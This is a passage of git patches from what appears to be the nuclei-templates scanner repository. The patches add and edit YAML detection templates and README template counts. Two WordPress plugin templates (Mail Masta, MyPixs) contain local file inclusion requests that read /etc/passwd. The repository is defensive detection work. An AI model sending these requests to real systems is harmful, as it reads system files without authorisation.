csvexport.php. + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956 + tags: cve,cve2016,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" + - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 From 6b93d25c1f346f7dbfd3a0d88b39152d68a7da80 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 14 Jul 2021 16:34:26 +0530 Subject: [PATCH 0560/4083] Update dead-host-with-cname.yaml --- dns/dead-host-with-cname.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dns/dead-host-with-cname.yaml b/dns/dead-host-with-cname.yaml index 3e40eabae6..d5e8fa1392 100644 --- a/dns/dead-host-with-cname.yaml +++ b/dns/dead-host-with-cname.yaml @@ -1,8 +1,8 @@ id: dead-host-with-cname info: - name: dead-host-with-cname - author: pdteam + name: Detect Dangling cnames + author: pdteam,nytr0gen severity: info tags: dns From f63f8252831f7dde5ed9016a8fd94c330d4d0543 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 18:10:41 +0700 Subject: [PATCH 0561/4083] Create CVE-2015-1000012.yaml --- cves/2015/CVE-2015-1000012.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2015/CVE-2015-1000012.yaml diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml new file mode 100644 index 0000000000..0161acc83b --- /dev/null +++ b/cves/2015/CVE-2015-1000012.yaml @@ -0,0 +1,23 @@ +id: CVE-2015-1000012 + +info: + name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) + author: daffainfo + severity: high + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 From 3a78131101236d4d983cd8ed7fe3ff5a4b7bb93e Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 14 Jul 2021 16:58:05 +0530 Subject: [PATCH 0562/4083] Update adobe-media-server.yaml --- exposed-panels/adobe-media-server.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/exposed-panels/adobe-media-server.yaml b/exposed-panels/adobe-media-server.yaml index 62e932e74d..deaf55913a 100644 --- a/exposed-panels/adobe-media-server.yaml +++ b/exposed-panels/adobe-media-server.yaml @@ -17,8 +17,6 @@ requests: - type: word words: - 'Adobe Media Server' - - 'Adobe Systems Incorporated' - condition: and - type: status status: From f2d8d4cad04d4db08040d5978418bddc58942545 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 14 Jul 2021 16:59:12 +0530 Subject: [PATCH 0563/4083] Update default-ibm-http-server.yaml --- technologies/default-ibm-http-server.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/technologies/default-ibm-http-server.yaml b/technologies/default-ibm-http-server.yaml index 108aeae31a..8961433dbc 100644 --- a/technologies/default-ibm-http-server.yaml +++ b/technologies/default-ibm-http-server.yaml @@ -18,8 +18,6 @@ requests: words: - 'IBM HTTP Server' - condition: and - - type: status status: - 200 From 00f1e65d5097cd39377ba867bbfae5533de1b652 Mon Sep 17 00:00:00 2001 From: Suman Kar Date: Wed, 14 Jul 2021 17:01:59 +0530 Subject: [PATCH 0564/4083] Update-sassy-social-share-xss --- vulnerabilities/wordpress/sassy-social-share.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/sassy-social-share.yaml b/vulnerabilities/wordpress/sassy-social-share.yaml index 1f7d584a75..18de717ad7 100644 --- a/vulnerabilities/wordpress/sassy-social-share.yaml +++ b/vulnerabilities/wordpress/sassy-social-share.yaml @@ -15,5 +15,10 @@ requests: matchers: - type: word words: - - '{"facebook_urls":[{"":""}],"status":1,"message":{"":{"twitter":0}}}' - part: body \ No newline at end of file + - '{"facebook":1,"facebook_urls":[{"":""}],"status":1,"message":' + part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 37f592b519e623b6d8436453f17022d321c91ceb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 11:36:16 +0000 Subject: [PATCH 0565/4083] Auto Update README [Wed Jul 14 11:36:16 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 3751c63dae..5f2420d404 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 401 | vulnerabilities | 225 | exposed-panels | 197 | -| takeovers | 70 | exposures | 115 | technologies | 117 | +| cves | 401 | vulnerabilities | 225 | exposed-panels | 200 | +| takeovers | 70 | exposures | 115 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1506 files**. +**127 directories, 1512 files**. From 367bfd44415d4f68f66a3d1f3d1086293a1e0f18 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 14 Jul 2021 17:38:01 +0530 Subject: [PATCH 0566/4083] Added keycloak-openid-config --- exposures/configs/keycloak-openid-config.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposures/configs/keycloak-openid-config.yaml diff --git a/exposures/configs/keycloak-openid-config.yaml b/exposures/configs/keycloak-openid-config.yaml new file mode 100644 index 0000000000..e9d66b6533 --- /dev/null +++ b/exposures/configs/keycloak-openid-config.yaml @@ -0,0 +1,29 @@ +id: keycloak-openid-config + +info: + name: Keycloak openid-config + author: rodnt + severity: info + reference: https://issues.jboss.org/browse/KEYCLOAK-571 + tags: keycloak,config + +requests: + - method: GET + path: + - "{{BaseURL}}/.well-known/openid-configuration" + - "{{BaseURL}}/auth/realms/master/.well-known/openid-configuration" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'issuer' + - 'authorization_endpoint' + - 'token_endpoint' + - 'userinfo_endpoint' + - 'jwks_uri' + condition: and \ No newline at end of file From 950cc356eec047f628a056775c7e8ebf05662cd7 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 14 Jul 2021 17:39:50 +0530 Subject: [PATCH 0567/4083] path update --- exposures/configs/keycloak-openid-config.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposures/configs/keycloak-openid-config.yaml b/exposures/configs/keycloak-openid-config.yaml index e9d66b6533..0dc1bb7bb9 100644 --- a/exposures/configs/keycloak-openid-config.yaml +++ b/exposures/configs/keycloak-openid-config.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "{{BaseURL}}/.well-known/openid-configuration" - - "{{BaseURL}}/auth/realms/master/.well-known/openid-configuration" matchers-condition: and matchers: From e232ba52d4e6922cb1c7ace2139100fff6d14cc2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 14 Jul 2021 18:24:26 +0530 Subject: [PATCH 0568/4083] Added additional path --- exposures/configs/keycloak-openid-config.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/keycloak-openid-config.yaml b/exposures/configs/keycloak-openid-config.yaml index 0dc1bb7bb9..e9d66b6533 100644 --- a/exposures/configs/keycloak-openid-config.yaml +++ b/exposures/configs/keycloak-openid-config.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/.well-known/openid-configuration" + - "{{BaseURL}}/auth/realms/master/.well-known/openid-configuration" matchers-condition: and matchers: From 2f3470ca1fff24e07239d98dc1984bbdb3b2a356 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 18:36:19 +0530 Subject: [PATCH 0569/4083] Update CVE-2011-4926.yaml --- cves/2011/CVE-2011-4926.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2011/CVE-2011-4926.yaml b/cves/2011/CVE-2011-4926.yaml index 465eeaba59..17178b7f7d 100644 --- a/cves/2011/CVE-2011-4926.yaml +++ b/cves/2011/CVE-2011-4926.yaml @@ -4,6 +4,7 @@ info: name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 tags: cve,cve2011,wordpress,xss,wp-plugin From d3dbee8c8a6bebdd805ca8ddd8c5716c48c3eb4b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:06:50 +0000 Subject: [PATCH 0570/4083] Auto Update README [Wed Jul 14 13:06:50 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5f2420d404..d0e3ab359b 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 401 | vulnerabilities | 225 | exposed-panels | 200 | +| cves | 402 | vulnerabilities | 225 | exposed-panels | 200 | | takeovers | 70 | exposures | 115 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1512 files**. +**127 directories, 1513 files**. From 4530f816e71a0531fb691f1ad5a1f66340961485 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 18:37:19 +0530 Subject: [PATCH 0571/4083] Update CVE-2011-4618.yaml --- cves/2011/CVE-2011-4618.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2011/CVE-2011-4618.yaml b/cves/2011/CVE-2011-4618.yaml index a6ee265f87..e043051810 100644 --- a/cves/2011/CVE-2011-4618.yaml +++ b/cves/2011/CVE-2011-4618.yaml @@ -4,6 +4,7 @@ info: name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618 tags: cve,cve2011,wordpress,xss,wp-plugin From 2b847b1f0df5577b6e5228f621be808a65510849 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:07:48 +0000 Subject: [PATCH 0572/4083] Auto Update README [Wed Jul 14 13:07:48 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d0e3ab359b..1bb0a96b6e 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 402 | vulnerabilities | 225 | exposed-panels | 200 | +| cves | 403 | vulnerabilities | 225 | exposed-panels | 200 | | takeovers | 70 | exposures | 115 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1513 files**. +**127 directories, 1514 files**. From b24958c9666718479f29e6e3f3a6580ab399b454 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 18:38:27 +0530 Subject: [PATCH 0573/4083] Update CVE-2011-5107.yaml --- cves/2011/CVE-2011-5107.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2011/CVE-2011-5107.yaml b/cves/2011/CVE-2011-5107.yaml index dd4bb57d56..c01e565c70 100644 --- a/cves/2011/CVE-2011-5107.yaml +++ b/cves/2011/CVE-2011-5107.yaml @@ -4,6 +4,7 @@ info: name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 tags: cve,cve2011,wordpress,xss,wp-plugin From 31c69d6a53515c586a1241f67e47dc8fd912eed6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 18:39:10 +0530 Subject: [PATCH 0574/4083] Update CVE-2011-5179.yaml --- cves/2011/CVE-2011-5179.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2011/CVE-2011-5179.yaml b/cves/2011/CVE-2011-5179.yaml index 525fb30022..9c92b5cf55 100644 --- a/cves/2011/CVE-2011-5179.yaml +++ b/cves/2011/CVE-2011-5179.yaml @@ -4,6 +4,7 @@ info: name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179 tags: cve,cve2011,wordpress,xss,wp-plugin From 78f0b52de705a9637f283006d25b910df96305d5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:09:56 +0000 Subject: [PATCH 0575/4083] Auto Update README [Wed Jul 14 13:09:56 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 1bb0a96b6e..7e3deb6220 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 403 | vulnerabilities | 225 | exposed-panels | 200 | -| takeovers | 70 | exposures | 115 | technologies | 120 | +| cves | 404 | vulnerabilities | 225 | exposed-panels | 200 | +| takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1514 files**. +**127 directories, 1516 files**. From 42395f3cf0ee58f82b0eb304b8cbfc62bd89a962 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 18:40:07 +0530 Subject: [PATCH 0576/4083] Update CVE-2011-5181.yaml --- cves/2011/CVE-2011-5181.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2011/CVE-2011-5181.yaml b/cves/2011/CVE-2011-5181.yaml index 9fbd09ccba..41812c748a 100644 --- a/cves/2011/CVE-2011-5181.yaml +++ b/cves/2011/CVE-2011-5181.yaml @@ -4,6 +4,7 @@ info: name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 tags: cve,cve2011,wordpress,xss,wp-plugin From 492fcb168b6c09138ac4749c95d0dd4080af1cd2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:10:30 +0000 Subject: [PATCH 0577/4083] Auto Update README [Wed Jul 14 13:10:30 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7e3deb6220..89199e1c04 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 404 | vulnerabilities | 225 | exposed-panels | 200 | +| cves | 405 | vulnerabilities | 225 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1516 files**. +**127 directories, 1517 files**. From 7f210b692aba3445aaf485b4873db7c7f45892e8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 18:45:47 +0530 Subject: [PATCH 0578/4083] Update CVE-2011-5265.yaml --- cves/2011/CVE-2011-5265.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2011/CVE-2011-5265.yaml b/cves/2011/CVE-2011-5265.yaml index fc3176a45a..7d3f326e77 100644 --- a/cves/2011/CVE-2011-5265.yaml +++ b/cves/2011/CVE-2011-5265.yaml @@ -4,6 +4,7 @@ info: name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. NOTE: this has been disputed by a third party. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 tags: cve,cve2011,wordpress,xss,wp-plugin From d54e50e7e8b15b270b55363b881624c466c48841 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:16:18 +0000 Subject: [PATCH 0579/4083] Auto Update README [Wed Jul 14 13:16:18 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 89199e1c04..c1292f4fbd 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 405 | vulnerabilities | 225 | exposed-panels | 200 | +| cves | 406 | vulnerabilities | 225 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1517 files**. +**127 directories, 1518 files**. From 79881e5a5378591606cb4c214a65c2c80a0abfa9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 18:47:04 +0530 Subject: [PATCH 0580/4083] Update CVE-2011-5265.yaml --- cves/2011/CVE-2011-5265.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2011/CVE-2011-5265.yaml b/cves/2011/CVE-2011-5265.yaml index 7d3f326e77..2ed7592d9e 100644 --- a/cves/2011/CVE-2011-5265.yaml +++ b/cves/2011/CVE-2011-5265.yaml @@ -4,7 +4,7 @@ info: name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. NOTE: this has been disputed by a third party. + description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 tags: cve,cve2011,wordpress,xss,wp-plugin From 4f92a4448126447cf9c0ccc157a1edd3df2301ea Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 18:48:09 +0530 Subject: [PATCH 0581/4083] Update CVE-2012-0901.yaml --- cves/2012/CVE-2012-0901.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-0901.yaml b/cves/2012/CVE-2012-0901.yaml index 165a3c2afc..fb82bdfed6 100644 --- a/cves/2012/CVE-2012-0901.yaml +++ b/cves/2012/CVE-2012-0901.yaml @@ -4,6 +4,7 @@ info: name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901 tags: cve,cve2012,wordpress,xss,wp-plugin From e72fd2317d389b2c569ff4acfff479b233b2703c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:18:33 +0000 Subject: [PATCH 0582/4083] Auto Update README [Wed Jul 14 13:18:33 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c1292f4fbd..c1f1d819e7 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 406 | vulnerabilities | 225 | exposed-panels | 200 | +| cves | 407 | vulnerabilities | 225 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1518 files**. +**127 directories, 1519 files**. From 08d11bf9c70ae01ea49c909d402a4f0f7c77b747 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:36:48 +0000 Subject: [PATCH 0583/4083] Auto Update README [Wed Jul 14 13:36:48 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c1f1d819e7..d35c2ec650 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 407 | vulnerabilities | 225 | exposed-panels | 200 | +| cves | 408 | vulnerabilities | 225 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1519 files**. +**127 directories, 1520 files**. From 0767a5b9f38a6bb8dd93f1ddb1fcbfbe92f726f4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 19:07:09 +0530 Subject: [PATCH 0584/4083] Update CVE-2012-2371.yaml --- cves/2012/CVE-2012-2371.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-2371.yaml b/cves/2012/CVE-2012-2371.yaml index 3e63655c9b..61a2207ec3 100644 --- a/cves/2012/CVE-2012-2371.yaml +++ b/cves/2012/CVE-2012-2371.yaml @@ -4,6 +4,7 @@ info: name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371 tags: cve,cve2012,wordpress,xss,wp-plugin From 0af70752fcdbda886ce8392f1d02014bd7eaa26f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 19:08:13 +0530 Subject: [PATCH 0585/4083] Update CVE-2012-5913.yaml --- cves/2012/CVE-2012-5913.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-5913.yaml b/cves/2012/CVE-2012-5913.yaml index 3feacd8a7f..be685d2507 100644 --- a/cves/2012/CVE-2012-5913.yaml +++ b/cves/2012/CVE-2012-5913.yaml @@ -4,6 +4,7 @@ info: name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913 tags: cve,cve2012,wordpress,xss,wp-plugin From b25131bc61c23b8df7e0682fdfd9bb623488a73e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:38:44 +0000 Subject: [PATCH 0586/4083] Auto Update README [Wed Jul 14 13:38:44 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d35c2ec650..be04a88557 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 408 | vulnerabilities | 225 | exposed-panels | 200 | +| cves | 409 | vulnerabilities | 225 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1520 files**. +**127 directories, 1521 files**. From 0ec4f8741f5f5bb5fc2432ac5b58c010a4dd7b2e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:40:05 +0000 Subject: [PATCH 0587/4083] Auto Update README [Wed Jul 14 13:40:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index be04a88557..003b5c009a 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 409 | vulnerabilities | 225 | exposed-panels | 200 | +| cves | 410 | vulnerabilities | 226 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1521 files**. +**127 directories, 1523 files**. From 5260e4ba18ebbddd5fe89d3d5bb0c82f8ea3b973 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 13:40:46 +0000 Subject: [PATCH 0588/4083] Auto Update README [Wed Jul 14 13:40:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 003b5c009a..c7873ffac9 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 410 | vulnerabilities | 226 | exposed-panels | 200 | +| cves | 410 | vulnerabilities | 227 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 120 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1523 files**. +**127 directories, 1524 files**. From 55ea2242b7ea3b05ebe103b49000f12375702131 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 19:14:06 +0530 Subject: [PATCH 0589/4083] Rename vulnerabilities/wp-slideshow-xss.yaml to vulnerabilities/wordpress/wp-slideshow-xss.yaml --- vulnerabilities/{ => wordpress}/wp-slideshow-xss.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/{ => wordpress}/wp-slideshow-xss.yaml (100%) diff --git a/vulnerabilities/wp-slideshow-xss.yaml b/vulnerabilities/wordpress/wp-slideshow-xss.yaml similarity index 100% rename from vulnerabilities/wp-slideshow-xss.yaml rename to vulnerabilities/wordpress/wp-slideshow-xss.yaml From 3f5a32b61c38422cc859547b698c557ee3db037e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 19:14:56 +0530 Subject: [PATCH 0590/4083] Update CVE-2013-4117.yaml --- cves/2013/CVE-2013-4117.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2013/CVE-2013-4117.yaml b/cves/2013/CVE-2013-4117.yaml index f539f2ed7b..f30a61b264 100644 --- a/cves/2013/CVE-2013-4117.yaml +++ b/cves/2013/CVE-2013-4117.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: 